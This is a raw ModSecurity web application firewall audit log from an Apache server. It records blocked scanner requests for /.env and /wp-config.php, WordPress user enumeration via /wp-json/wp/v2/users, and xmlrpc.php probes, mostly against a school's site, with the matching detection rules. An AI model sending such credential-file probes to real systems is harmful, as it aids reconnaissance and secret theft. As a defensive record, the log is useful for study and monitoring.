"apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744969843546496 782 (- - -) Stopwatch2: 1744969843546496 782; combined=349, p1=315, p2=0, p3=0, p4=0, p5=34, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8062b765-Z-- --82f9820c-A-- [18/Apr/2025:17:25:14 +0700] aAIoijpR4B6O-aqWibM97wAAAJc 103.236.140.4 47644 103.236.140.4 8181 --82f9820c-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 209.38.248.17 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 209.38.248.17 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --82f9820c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82f9820c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744971914625441 864 (- - -) Stopwatch2: 1744971914625441 864; combined=370, p1=302, p2=0, p3=0, p4=0, p5=68, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82f9820c-Z-- --2b86b829-A-- [18/Apr/2025:18:37:47 +0700] aAI5izlhhbF_BYhFYTVcSwAAAEc 103.236.140.4 35780 103.236.140.4 8181 --2b86b829-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 146.190.242.161 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 146.190.242.161 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --2b86b829-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b86b829-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744976267354541 705 (- - -) Stopwatch2: 1744976267354541 705; combined=300, p1=271, p2=0, p3=0, p4=0, p5=29, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b86b829-Z-- --d82b3b3f-A-- [18/Apr/2025:19:13:49 +0700] aAJB_TlhhbF_BYhFYTVmagAAAE0 103.236.140.4 44258 103.236.140.4 8181 --d82b3b3f-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 209.97.180.8 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 209.97.180.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --d82b3b3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d82b3b3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744978429165000 822 (- - -) Stopwatch2: 1744978429165000 822; combined=345, p1=307, p2=0, p3=0, p4=0, p5=38, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d82b3b3f-Z-- --6ac31f1f-A-- [18/Apr/2025:20:15:47 +0700] aAJQg1yj-eUTITfvHEXWYQAAAAw 103.236.140.4 51602 103.236.140.4 8181 --6ac31f1f-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 167.172.158.128 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 167.172.158.128 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --6ac31f1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ac31f1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744982147423247 858 (- - -) Stopwatch2: 1744982147423247 858; combined=359, p1=318, p2=0, p3=0, p4=0, p5=41, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ac31f1f-Z-- --3d05fa57-A-- [18/Apr/2025:20:19:05 +0700] aAJRSTpR4B6O-aqWibNt0AAAAIs 103.236.140.4 52372 103.236.140.4 8181 --3d05fa57-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.227.70.2 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --3d05fa57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d05fa57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744982345125843 794 (- - -) Stopwatch2: 1744982345125843 794; combined=285, p1=251, p2=0, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d05fa57-Z-- --e0b2af22-A-- [18/Apr/2025:20:31:23 +0700] aAJUKzlhhbF_BYhFYTWM0QAAAEM 103.236.140.4 55252 103.236.140.4 8181 --e0b2af22-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 128.199.198.141 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 128.199.198.141 Accept-Encoding: gzip X-Varnish: 128758797 --e0b2af22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e0b2af22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744983083946917 865 (- - -) Stopwatch2: 1744983083946917 865; combined=354, p1=315, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0b2af22-Z-- --b5f25568-A-- [18/Apr/2025:20:42:28 +0700] aAJWxDlhhbF_BYhFYTWOpQAAAE0 103.236.140.4 57872 103.236.140.4 8181 --b5f25568-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.238 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b5f25568-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5f25568-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744983748700215 2772 (- - -) Stopwatch2: 1744983748700215 2772; combined=1368, p1=435, p2=903, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5f25568-Z-- --1b35e701-A-- [18/Apr/2025:20:42:31 +0700] aAJWxzlhhbF_BYhFYTWOqQAAAEc 103.236.140.4 57888 103.236.140.4 8181 --1b35e701-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1b35e701-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b35e701-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744983751243084 3181 (- - -) Stopwatch2: 1744983751243084 3181; combined=1417, p1=519, p2=869, p3=0, p4=0, p5=29, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b35e701-Z-- --59f70f69-A-- [18/Apr/2025:23:05:25 +0700] aAJ4RRk6uTiIdxrJEERlSQAAANE 103.236.140.4 34636 103.236.140.4 8181 --59f70f69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 157.245.232.123 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 157.245.232.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --59f70f69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59f70f69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744992325280118 899 (- - -) Stopwatch2: 1744992325280118 899; combined=390, p1=352, p2=0, p3=0, p4=0, p5=38, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59f70f69-Z-- --1f776018-A-- [18/Apr/2025:23:35:25 +0700] aAJ_TTpR4B6O-aqWibN8OgAAAJg 103.236.140.4 43694 103.236.140.4 8181 --1f776018-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.110 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1f776018-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f776018-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744994125042861 3848 (- - -) Stopwatch2: 1744994125042861 3848; combined=2207, p1=665, p2=1500, p3=0, p4=0, p5=42, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f776018-Z-- --7632cb22-A-- [18/Apr/2025:23:35:27 +0700] aAJ_TzlhhbF_BYhFYTWZSAAAAEc 103.236.140.4 43706 103.236.140.4 8181 --7632cb22-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7632cb22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7632cb22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744994127342293 2480 (- - -) Stopwatch2: 1744994127342293 2480; combined=1160, p1=412, p2=715, p3=0, p4=0, p5=33, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7632cb22-Z-- --abecac51-A-- [18/Apr/2025:23:35:29 +0700] aAJ_URk6uTiIdxrJEERnUQAAAM8 103.236.140.4 43718 103.236.140.4 8181 --abecac51-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.110 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --abecac51-C-- demo.sayHello --abecac51-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --abecac51-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744994129662839 6194 (- - -) Stopwatch2: 1744994129662839 6194; combined=4845, p1=614, p2=3890, p3=23, p4=25, p5=160, sr=69, sw=133, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abecac51-Z-- --2303065a-A-- [18/Apr/2025:23:35:43 +0700] aAJ_Xxk6uTiIdxrJEERnVgAAAM4 103.236.140.4 43810 103.236.140.4 8181 --2303065a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.93.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.93.110 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2303065a-C-- demo.sayHello --2303065a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2303065a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744994143673750 6643 (- - -) Stopwatch2: 1744994143673750 6643; combined=4762, p1=711, p2=3789, p3=36, p4=40, p5=108, sr=193, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2303065a-Z-- --f639f11b-A-- [18/Apr/2025:23:51:10 +0700] aAKC_jpR4B6O-aqWibN9DwAAAJQ 103.236.140.4 47310 103.236.140.4 8181 --f639f11b-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 142.93.0.66 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 142.93.0.66 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f639f11b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f639f11b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744995070420605 776 (- - -) Stopwatch2: 1744995070420605 776; combined=310, p1=276, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f639f11b-Z-- --9a50db75-A-- [19/Apr/2025:00:19:57 +0700] aAKJvVyj-eUTITfvHEXjkwAAAA8 103.236.140.4 53896 103.236.140.4 8181 --9a50db75-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 188.166.108.93 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 188.166.108.93 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --9a50db75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a50db75-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744996797042802 754 (- - -) Stopwatch2: 1744996797042802 754; combined=323, p1=286, p2=0, p3=0, p4=0, p5=37, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a50db75-Z-- --9f879309-A-- [19/Apr/2025:01:44:40 +0700] aAKdmFyj-eUTITfvHEXwFAAAAAo 103.236.140.4 37070 103.236.140.4 8181 --9f879309-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 157.245.113.227 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 157.245.113.227 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --9f879309-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f879309-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745001880755317 838 (- - -) Stopwatch2: 1745001880755317 838; combined=322, p1=284, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f879309-Z-- --c17e840a-A-- [19/Apr/2025:01:45:56 +0700] aAKd5DlhhbF_BYhFYTWlvQAAAEk 103.236.140.4 37370 103.236.140.4 8181 --c17e840a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.86.112.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.86.112.29 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c17e840a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c17e840a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745001956620746 3135 (- - -) Stopwatch2: 1745001956620746 3135; combined=1356, p1=461, p2=855, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c17e840a-Z-- --0035893a-A-- [19/Apr/2025:01:54:10 +0700] aAKf0hk6uTiIdxrJEERxUwAAANQ 103.236.140.4 39324 103.236.140.4 8181 --0035893a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.118.228 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.118.228 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --0035893a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0035893a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745002450147221 888 (- - -) Stopwatch2: 1745002450147221 888; combined=389, p1=330, p2=0, p3=0, p4=0, p5=58, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0035893a-Z-- --9d220555-A-- [19/Apr/2025:02:20:10 +0700] aAKl6jlhhbF_BYhFYTWnMAAAAEI 103.236.140.4 45198 103.236.140.4 8181 --9d220555-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.233 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.233 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --9d220555-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d220555-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745004010426668 797 (- - -) Stopwatch2: 1745004010426668 797; combined=314, p1=274, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) 